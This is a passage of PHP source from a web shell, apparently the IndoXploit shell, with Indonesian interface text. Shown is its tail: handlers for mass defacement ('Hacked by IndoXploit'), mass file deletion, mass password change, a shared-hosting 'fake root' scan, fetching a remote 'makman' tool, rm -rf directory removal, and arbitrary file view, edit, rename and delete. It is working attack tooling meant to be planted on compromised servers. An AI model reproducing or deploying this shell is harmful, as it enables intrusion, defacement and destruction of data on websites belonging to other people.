1644 print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
1645 }
1646 mysql_close($conn);
1647 }
1648 }
1649 }
1650 }
1651 else {
1652 print "<center>
1653 <h1>Mass Password Change</h1>
1654 <form method='post'>
1655 <input type='radio' name='config_type' value='dir' checked>DIR Config<input type='radio' name='config_type' value='link'>LINK Config<br>
1656 <input type='text' size='50' name='config_dir' value='".path()."'><br><br>
1657 Set User & Pass: <br>
1658 <input type='text' name='user_baru' value='indoxploit' placeholder='user_baru'><br>
1659 <input type='text' name='pass_baru' value='indoxploit' placeholder='pass_baru'><br>
1660 <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 215px; margin: 5px auto;' type='submit' name='hajar' value='Hajar!'>
1661 </form></center>";
1662 }
1663 }
1664 elseif($_GET['do'] === "mass") {
1665 if($_POST['start']) {
1666 if($_POST['mass_type'] === 'singledir') {
1667 print "<div style='margin: 5px auto; padding: 5px'>";
1668 massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file']);
1669 print "</div>";
1670 }
1671 elseif($_POST['mass_type'] === 'alldir') {
1672 print "<div style='margin: 5px auto; padding: 5px'>";
1673 massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file'], "-alldir");
1674 print "</div>";
1675 }
1676 elseif($_POST['mass_type'] === "delete") {
1677 print "<div style='margin: 5px auto; padding: 5px'>";
1678 massdelete($_POST['d_dir'], $_POST['d_file']);
1679 print "</div>";
1680 }
1681 }
1682 else {
1683 print "<center><form method='post'>
1684 <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
1685 <input type='radio' name='mass_type' value='singledir' checked>Mass Deface Single Directory<input type='radio' name='mass_type' value='alldir'>Mass Deface All Directory<input type='radio' name='mass_type' value='delete'>Mass Delete File<br>
1686 <span>( kosongkan 'Index File' jika memilih Mass Delete File )</span><br><br>
1687 <font style='text-decoration: underline;'>Folder:</font><br>
1688 <input type='text' name='d_dir' value='".path()."' style='width: 450px;' height='10'><br><br>
1689 <font style='text-decoration: underline;'>Filename:</font><br>
1690 <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br><br>
1691 <font style='text-decoration: underline;'>Index File:</font><br>
1692 <textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
1693 <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px; margin: 5px auto;' type='submit' name='start' value='Mass'>
1694 </form></center>";
1695 }
1696 }
1697 elseif($_GET['do'] == 'fakeroot') {
1698 ob_start();
1699
1700 $site = explode("\r\n", $_POST['url']);
1701 $user = usergroup()->name;
1702 $file = $_POST['file'];
1703
1704 if(!preg_match("#/home/$user/public_html#", $_SERVER['DOCUMENT_ROOT'])) die(color(1, 1, "I think this server not using shared host :("));
1705
1706
1707 if($_POST['reverse']) {
1708 if(!is_writable($_SERVER['DOCUMENT_ROOT'])) die(color(1, 1, "Directory '".$_SERVER['DOCUMENT_ROOT']."' is not writeable."));
1709 if(!is_writable(dirname($_SERVER['DOCUMENT_ROOT']))) die(color(1, 1, "Directory '".dirname($_SERVER['DOCUMENT_ROOT'])."' is not writeable."));
1710
1711 save($_SERVER['DOCUMENT_ROOT']."/".$file, "w", $_POST['script']);
1712 save(dirname($_SERVER['DOCUMENT_ROOT'])."/".$file, "w", $_POST['script']);
1713
1714 foreach($site as $url) {
1715 $cek = curl("$url/~$user/$file");
1716 if(preg_match("/hacked/i", $cek)) {
1717 print "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
1718 }
1719 }
1720 } else {
1721 print "<center><form method='post'>
1722 Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
1723 User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
1724 Domain: <br>
1725 <textarea style='width: 450px; height: 250px;' name='url'>";
1726 print implode("\n", reverse());
1727 print "</textarea><br>
1728 <font style='text-decoration: underline;'>Index File:</font><br>
1729 <textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
1730 <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px; margin: 5px auto;' type='submit' name='reverse' value='Scan Fake Root!'>
1731 </form><br>
1732 NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
1733 }
1734 }
1735 elseif($_GET['do'] === 'lre') {
1736 if(file_exists("makman.php")) {
1737 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/makman.php' frameborder='0' scrolling='yes'></iframe>";
1738 }
1739 else {
1740 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'Makman'."));
1741 if(getfile("LRE")) {
1742 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/makman.php' frameborder='0' scrolling='yes'></iframe>";
1743 }
1744 else {
1745 print color(1, 1, "Error while downloading file makman.");
1746 @unlink("makman.php");
1747 }
1748 }
1749
1750 }
1751 }
1752 elseif(isset($_GET['act'])) {
1753 if($_GET['act'] === 'newfile') {
1754 if($_POST['save']) {
1755 $filename = htmlspecialchars($_POST['filename']);
1756 $fopen = fopen($filename, "a+");
1757 if($fopen) {
1758 $act = "<script>window.location='?act=edit&dir=".path()."&file=".$_POST['filename']."';</script>";
1759 }
1760 else {
1761 $act = color(1, 1, "Permission Denied!");
1762 }
1763 }
1764 print $act;
1765 print "<form method='post'>
1766 Filename: <input type='text' name='filename' value='".path()."/newfile.php' style='width: 450px;' height='10'>
1767 <input type='submit' class='input' name='save' value='SUBMIT'>
1768 </form>";
1769 }
1770 elseif($_GET['act'] === 'newfolder') {
1771 if($_POST['save']) {
1772 $foldername = path().'/'.htmlspecialchars($_POST['foldername']);
1773 if(!@mkdir($foldername)) {
1774 $act = color(1, 1, "Permission Denied!");
1775 }
1776 else {
1777 $act = "<script>window.location='?dir=".path()."';</script>";
1778 }
1779 }
1780 print $act;
1781 print "<form method='post'>
1782 Folder Name: <input type='text' name='foldername' style='width: 450px;' height='10'>
1783 <input type='submit' class='input' name='save' value='SUBMIT'>
1784 </form>";
1785 }
1786 elseif($_GET['act'] === 'rename_folder') {
1787 if($_POST['save']) {
1788 $rename_folder = rename(path(), "".dirname(path()).DIRECTORY_SEPARATOR.htmlspecialchars($_POST['foldername']));
1789 if($rename_folder) {
1790 $act = "<script>window.location='?dir=".dirname(path())."';</script>";
1791 }
1792 else {
1793 $act = color(1, 1, "Permission Denied!");
1794 }
1795 print "$act<br>";
1796 }
1797 print "<form method='post'>
1798 <input type='text' value='".basename(path())."' name='foldername' style='width: 450px;' height='10'>
1799 <input type='submit' class='input' name='save' value='RENAME'>
1800 </form>";
1801 }
1802 elseif($_GET['act'] === 'delete_folder') {
1803 if(is_dir(path())) {
1804 if(is_writable(path())) {
1805 @rmdir(path());
1806 if(!@rmdir(path()) AND OS() === "Linux") @exe("rm -rf ".path());
1807 if(!@rmdir(path()) AND OS() === "Windows") @exe("rmdir /s /q ".path());
1808 $act = "<script>window.location='?dir=".dirname(path())."';</script>";
1809 }
1810 else {
1811 $act = color(1, 1, "Could not remove directory '".basename(path())."'");
1812 }
1813 }
1814 print $act;
1815 }
1816 elseif($_GET['act'] === 'view') {
1817 print "Filename: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]<br>";
1818 print "[ <a href='?act=view&dir=".path()."&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=".path()."&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=".path()."&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=".path()."&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=".path()."&file=".$_GET['file']."'>delete</a> ]<br>";
1819 print "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
1820 }
1821 elseif($_GET['act'] === 'edit') {
1822 if($_POST['save']) {
1823 $save = file_put_contents($_GET['file'], $_POST['src']);
1824 if($save) {
1825 $act = color(1, 2, "File Saved!");
1826 }
1827 else {
1828 $act = color(1, 1, "Permission Denied!");
1829 }
1830 print "$act<br>";
1831 }
1832
1833 print "Filename: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]<br>";
1834 print "[ <a href='?act=view&dir=".path()."&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=".path()."&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=".path()."&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=".path()."&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=".path()."&file=".$_GET['file']."'>delete</a> ]<br>";
1835 print "<form method='post'>
1836 <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
1837 <input type='submit' class='input' value='SAVE' name='save' style='width: 500px;'>
1838 </form>";
1839 }
1840 elseif($_GET['act'] === 'rename') {
1841 if($_POST['save']) {
1842 $rename = rename($_GET['file'], path().DIRECTORY_SEPARATOR.htmlspecialchars($_POST['filename']));
1843 if($rename) {
1844 $act = "<script>window.location='?dir=".path()."';</script>";
1845 }
1846 else {
1847 $act = color(1, 1, "Permission Denied!");
1848 }
1849 print "$act<br>";
1850 }
1851
1852 print "Filename: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]<br>";
1853 print "[ <a href='?act=view&dir=".path()."&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=".path()."&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=".path()."&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=".path()."&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=".path()."&file=".$_GET['file']."'>delete</a> ]<br>";
1854 print "<form method='post'>
1855 <input type='text' value='".basename($_GET['file'])."' name='filename' style='width: 450px;' height='10'>
1856 <input type='submit' class='input' name='save' value='RENAME'>
1857 </form>";
1858 }
1859 elseif($_GET['act'] === 'delete') {
1860 $delete = unlink($_GET['file']);
1861 if($delete) {
1862 $act = "<script>window.location='?dir=".path()."';</script>";
1863 }
1864 else {
1865 $act = color(1, 1, "Permission Denied!");
1866 }
1867 print $act;
1868 }
1869 }
1870 else {
1871 files_and_folder();
1872 }
1873}
1874
1875serverinfo();
1876action();
1877?>
1878</body>
1879
1880</html>